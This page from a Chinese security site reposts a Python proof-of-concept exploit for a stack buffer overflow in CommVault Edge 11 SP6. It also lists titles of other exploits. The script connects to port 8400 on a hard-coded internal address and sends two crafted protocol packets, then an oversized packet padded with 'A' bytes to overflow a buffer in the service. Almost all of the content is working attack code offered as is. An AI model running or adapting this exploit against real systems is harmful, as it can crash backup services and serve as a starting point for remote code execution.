首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)
来源:vfocus.net 作者:redr2e 发布时间:2017-04-07  
import socket
import binascii
import time
import struct
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect(("10.101.0.85", 8400))
 
def sr(p=None, r=None):
        if p:
                print "sending %d bytes: %s " % (len(p)/2,p)
                payl = binascii.a2b_hex(p)
                s.send(payl)
        if r:
                data = s.recv(1024*2)
                print "received %d bytes: %s " % (len(data),binascii.b2a_hex(data))
 
 
 
 
pkt1  = "0000003800000010000000100000000f00000000000000000000000000000000000000000000000000000000000000010000000000000000"
pkt1 += "0000100309000101090000000000ffe80000000800010000"
pkt1 += "0000000400000004"
 
pkt2  = "0000100309000509000000090000ffe800000036"+"00018016"
pkt2 += "02000000"+"09050009"+"c14d4d0"+"000000000000000003a793102076376642e6578656a231a0200429d750500989796059c16e042"+"fd00b417"
 
 
pkt3  = "53534c634c6e54"+"01"+"000b"+"77696e323031322d303200"+"03"+"0000000300000001"
p = "41"*0xd0
pkt3 += p
 
sr(pkt1,1)
sr(pkt2,1)
sr(pkt3,1)
exit()
 
 
 
 
s.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple WebKit - 'WebCore::toJS'
·Moodle 2.x/3.x - SQL Injection
·Apple WebKit - 'table' Use-Aft
·CyanogenMod 12 Stagefright (.M
·Apple WebKit - 'ComposedTreeIt
·Moxa MXview 2.8 - Private Key
·Apple WebKit - 'FormSubmission
·Moxa MXview 2.8 - Denial of Se
·Apple WebKit - Negative-Size m
·Moxa MX AOPC-Server 1.5 - XML
·Apple WebKit - 'RenderLayer' U
·Wordpress webplayer Plugins SQ
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved